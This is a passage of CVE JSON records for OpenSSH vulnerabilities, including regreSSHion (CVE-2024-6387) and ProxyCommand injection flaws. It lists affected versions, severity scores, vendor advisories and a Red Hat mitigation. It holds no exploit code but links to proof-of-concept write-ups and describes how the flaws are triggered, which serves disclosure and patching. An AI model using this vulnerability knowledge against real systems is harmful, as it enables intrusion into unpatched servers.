"url": "http://www.openwall.com/lists/oss-security/2024/07/03/3"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/4"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/5"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/04/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/04/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/08/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/08/3"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/09/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/09/5"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/3"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/4"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/6"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/11/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/11/3"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/23/4"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/23/6"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/28/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/28/3"
},
{
"name": "RHSA-2024:4312",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4312"
},
{
"name": "RHSA-2024:4340",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4340"
},
{
"name": "RHSA-2024:4389",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4389"
},
{
"name": "RHSA-2024:4469",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4469"
},
{
"name": "RHSA-2024:4474",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4474"
},
{
"name": "RHSA-2024:4479",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4479"
},
{
"name": "RHSA-2024:4484",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4484"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-6387"
},
{
"tags": [
"x_transferred"
],
"url": "https://archlinux.org/news/the-sshd-service-needs-to-be-restarted-after-upgrading-to-openssh-98p1/"
},
{
"tags": [
"x_transferred"
],
"url": "https://arstechnica.com/security/2024/07/regresshion-vulnerability-in-openssh-gives-attackers-root-on-linux/"
},
{
"tags": [
"x_transferred"
],
"url": "https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server"
},
{
"name": "RHBZ#2294604",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294604"
},
{
"tags": [
"x_transferred"
],
"url": "https://explore.alas.aws.amazon.com/CVE-2024-6387.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://forum.vmssoftware.com/viewtopic.php?f=8\u0026t=9132"
},
{
"tags": [
"x_transferred"
],
"url": "https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2024-002.txt.asc"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/AlmaLinux/updates/issues/629"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/Azure/AKS/issues/4379"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/PowerShell/Win32-OpenSSH/discussions/2248"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/PowerShell/Win32-OpenSSH/issues/2249"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/microsoft/azurelinux/issues/9555"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/openela-main/openssh/commit/e1f438970e5a337a17070a637c1b9e19697cad09"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/oracle/oracle-linux/issues/149"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/rapier1/hpn-ssh/issues/87"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/zgzhang/cve-2024-6387-poc"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.almalinux.org/archives/list/announce@lists.almalinux.org/thread/23BF5BMGFVEVUI2WNVAGMLKT557EU7VY/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-July/000158.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.mindrot.org/pipermail/openssh-unix-dev/2024-July/041431.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://news.ycombinator.com/item?id=40843778"
},
{
"tags": [
"x_transferred"
],
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0010"
},
{
"tags": [
"x_transferred"
],
"url": "https://santandersecurityresearch.github.io/blog/sshing_the_masses.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security-tracker.debian.org/tracker/CVE-2024-6387"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240701-0001/"
},
{
"tags": [
"x_transferred"
],
"url": "https://sig-security.rocky.page/issues/CVE-2024-6387/"
},
{
"tags": [
"x_transferred"
],
"url": "https://stackdiary.com/openssh-race-condition-in-sshd-allows-remote-code-execution/"
},
{
"tags": [
"x_transferred"
],
"url": "https://ubuntu.com/security/CVE-2024-6387"
},
{
"tags": [
"x_transferred"
],
"url": "https://ubuntu.com/security/notices/USN-6859-1"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.akamai.com/blog/security-research/2024-openssh-vulnerability-regression-what-to-know-and-do"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.arista.com/en/support/advisories-notices/security-advisory/19904-security-advisory-0100"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.freebsd.org/security/advisories/FreeBSD-SA-24:04.openssh.asc"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.openssh.com/txt/release-9.8"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.splunk.com/en_us/blog/security/cve-2024-6387-regresshion-vulnerability.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.suse.com/security/cve/CVE-2024-6387.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.theregister.com/2024/07/01/regresshion_openssh/"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.apple.com/kb/HT214119"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.apple.com/kb/HT214118"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.apple.com/kb/HT214120"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2024/Jul/20"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2024/Jul/18"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2024/Jul/19"
}
],
"title": "CVE Program Container",
"x_generator": {
"engine": "ADPogram 0.0.1"
}
}
],
"cna": {
"affected": [
{
"collectionURL": "https://www.openssh.com/",
"defaultStatus": "unaffected",
"packageName": "OpenSSH",
"repo": "https://anongit.mindrot.org/openssh.git",
"versions": [
{
"lessThanOrEqual": "9.7p1",
"status": "affected",
"version": "8.5p1",
"versionType": "custom"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-38.el9_4.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-38.el9_4.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:9.0::baseos",
"cpe:/a:redhat:rhel_e4s:9.0::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-12.el9_0.1",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.2::baseos",
"cpe:/a:redhat:rhel_eus:9.2::appstream"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:8.7p1-30.el9_2.4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:openshift:4.13::el9",
"cpe:/a:redhat:openshift:4.13::el8"
],
"defaultStatus": "affected",
"packageName": "rhcos",
"product": "Red Hat OpenShift Container Platform 4.13",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "413.92.202407091321-0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:openshift:4.14::el9",
"cpe:/a:redhat:openshift:4.14::el8"
],
"defaultStatus": "affected",
"packageName": "rhcos",
"product": "Red Hat OpenShift Container Platform 4.14",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "414.92.202407091253-0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:openshift:4.15::el8",
"cpe:/a:redhat:openshift:4.15::el9"
],
"defaultStatus": "affected",
"packageName": "rhcos",
"product": "Red Hat OpenShift Container Platform 4.15",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "415.92.202407091355-0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:openshift:4.16::el9"
],
"defaultStatus": "affected",
"packageName": "rhcos",
"product": "Red Hat OpenShift Container Platform 4.16",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "416.94.202407081958-0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ceph_storage:5"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Ceph Storage 5",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ceph_storage:6"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Ceph Storage 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ceph_storage:7"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Ceph Storage 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:10"
],
"defaultStatus": "affected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 10",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "unaffected",
"packageName": "openssh",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
}
],
"credits": [
{
"lang": "en",
"value": "Red Hat would like to thank Qualys Threat Research Unit (TRU) (Qualys) for reporting this issue."
}
],
"datePublic": "2024-07-01T08:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A security regression (CVE-2006-5051) was discovered in OpenSSH\u0027s server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-364",
"description": "Signal Handler Race Condition",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-11T16:12:24.347Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:4312",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4312"
},
{
"name": "RHSA-2024:4340",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4340"
},
{
"name": "RHSA-2024:4389",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4389"
},
{
"name": "RHSA-2024:4469",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4469"
},
{
"name": "RHSA-2024:4474",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4474"
},
{
"name": "RHSA-2024:4479",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4479"
},
{
"name": "RHSA-2024:4484",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4484"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-6387"
},
{
"name": "RHBZ#2294604",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294604"
},
{
"url": "https://santandersecurityresearch.github.io/blog/sshing_the_masses.html"
},
{
"url": "https://www.openssh.com/txt/release-9.8"
},
{
"url": "https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-06-27T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2024-07-01T08:00:00+00:00",
"value": "Made public."
}
],
"title": "Openssh: regresshion - race condition in ssh allows rce/dos",
"workarounds": [
{
"lang": "en",
"value": "The below process can protect against a Remote Code Execution attack by disabling the LoginGraceTime parameter on Red Hat Enterprise Linux 9. However, the sshd server is still vulnerable to a Denial of Service if an attacker exhausts all the connections.\n\n1) As root user, open the /etc/ssh/sshd_config\n2) Add or edit the parameter configuration:\n~~~\nLoginGraceTime 0\n~~~\n3) Save and close the file\n4) Restart the sshd daemon:\n~~~\nsystemctl restart sshd.service\n~~~\n\nSetting LoginGraceTime to 0 disables the SSHD server\u0027s ability to drop connections if authentication is not completed within the specified timeout. If this mitigation is implemented, it is highly recommended to use a tool like \u0027fail2ban\u0027 alongside a firewall to monitor log files and manage connections appropriately.\n\nIf any of the mitigations mentioned above is used, please note that the removal of LoginGraceTime parameter from sshd_config is not automatic when the updated package is installed."
}
],
"x_redhatCweChain": "CWE-364: Signal Handler Race Condition"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2024-6387",
"datePublished": "2024-07-01T12:37:25.431Z",
"dateReserved": "2024-06-27T13:41:03.421Z",
"dateUpdated": "2025-11-11T16:12:24.347Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-51767 (GCVE-0-2023-51767)
Vulnerability from cvelistv5 – Published: 2023-12-24 00:00 – Updated: 2025-11-18 22:03- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-18T22:03:38.917Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://arxiv.org/abs/2309.02545"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/monitor.c#L878"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/auth-passwd.c#L77"
},
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255850"
},
{
"tags": [
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-51767"
},
{
"tags": [
"x_transferred"
],
"url": "https://ubuntu.com/security/CVE-2023-51767"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240125-0006/"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/10/01/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/22/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/24/4"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/22/2"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/23/4"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/10/01/2"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/26/2"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/26/4"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/2"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/3"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/5"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/6"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/7"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/29/4"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/29/5"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/23/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/29/6"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/23/3"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/23/5"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/24/7"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/25/2"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/25/6"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/4"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/28/7"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/29/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "OpenSSH through 10.0, when common types of DRAM are used, might allow row hammer attacks (for authentication bypass) because the integer value of authenticated in mm_answer_authpassword does not resist flips of a single bit. NOTE: this is applicable to a certain threat model of attacker-victim co-location in which the attacker has user privileges. NOTE: this is disputed by the Supplier, who states \"we do not consider it to be the application\u0027s responsibility to defend against platform architectural weaknesses.\""
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-22T16:42:44.854Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://arxiv.org/abs/2309.02545"
},
{
"url": "https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/monitor.c#L878"
},
{
"url": "https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/auth-passwd.c#L77"
},
{
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255850"
},
{
"url": "https://access.redhat.com/security/cve/CVE-2023-51767"
},
{
"url": "https://ubuntu.com/security/CVE-2023-51767"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240125-0006/"
},
{
"url": "https://www.openwall.com/lists/oss-security/2025/09/22/1"
}
],
"tags": [
"disputed"
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-51767",
"datePublished": "2023-12-24T00:00:00.000Z",
"dateReserved": "2023-12-24T00:00:00.000Z",
"dateUpdated": "2025-11-18T22:03:38.917Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-61985 (GCVE-0-2025-61985)
Vulnerability from nvd – Published: 2025-10-06 00:00 – Updated: 2025-10-06 18:34- CWE-158 - Improper Neutralization of Null Byte or NUL Character
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-61985",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-06T18:33:49.712677Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-06T18:34:24.777Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "OpenSSH",
"vendor": "OpenBSD",
"versions": [
{
"lessThan": "10.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"versionEndExcluding": "10.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ssh in OpenSSH before 10.1 allows the \u0027\\0\u0027 character in an ssh:// URI, potentially leading to code execution when a ProxyCommand is used."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-158",
"description": "CWE-158 Improper Neutralization of Null Byte or NUL Character",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-06T18:19:08.824Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.openwall.com/lists/oss-security/2025/10/06/1"
},
{
"url": "https://marc.info/?l=openssh-unix-dev\u0026m=175974522032149\u0026w=2"
},
{
"url": "https://www.openssh.com/releasenotes.html#10.1p1"
}
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-61985",
"datePublished": "2025-10-06T00:00:00.000Z",
"dateReserved": "2025-10-06T00:00:00.000Z",
"dateUpdated": "2025-10-06T18:34:24.777Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-61984 (GCVE-0-2025-61984)
Vulnerability from nvd – Published: 2025-10-06 00:00 – Updated: 2025-11-11 14:50- CWE-159 - Improper Handling of Invalid Use of Special Elements
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-61984",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-07T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-08T03:55:09.867Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://dgl.cx/2025/10/bash-a-newline-ssh-proxycommand-cve-2025-61984"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-11T14:50:56.007Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/10/07/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2025/10/12/1"
},
{
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-61984-detection-script-remote-code-execution-vulnerability-affecting-openssh"
},
{
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-61984-mitigation-script-remote-code-execution-vulnerability-affecting-openssh"
}
],
"title": "CVE Program Container",
"x_generator": {
"engine": "ADPogram 0.0.1"
}
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "OpenSSH",
"vendor": "OpenBSD",
"versions": [
{
"lessThan": "10.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"versionEndExcluding": "10.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ssh in OpenSSH before 10.1 allows control characters in usernames that originate from certain possibly untrusted sources, potentially leading to code execution when a ProxyCommand is used. The untrusted sources are the command line and %-sequence expansion of a configuration file. (A configuration file that provides a complete literal username is not categorized as an untrusted source.)"
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-159",
"description": "CWE-159 Improper Handling of Invalid Use of Special Elements",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-06T18:17:49.959Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.openwall.com/lists/oss-security/2025/10/06/1"
},
{
"url": "https://marc.info/?l=openssh-unix-dev\u0026m=175974522032149\u0026w=2"
},
{
"url": "https://www.openssh.com/releasenotes.html#10.1p1"
}
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-61984",
"datePublished": "2025-10-06T00:00:00.000Z",
"dateReserved": "2025-10-06T00:00:00.000Z",
"dateUpdated": "2025-11-11T14:50:56.007Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-32728 (GCVE-0-2025-32728)
Vulnerability from nvd – Published: 2025-04-10 00:00 – Updated: 2025-05-08 13:11- CWE-440 - Expected Behavior Violation
{
"containers": {
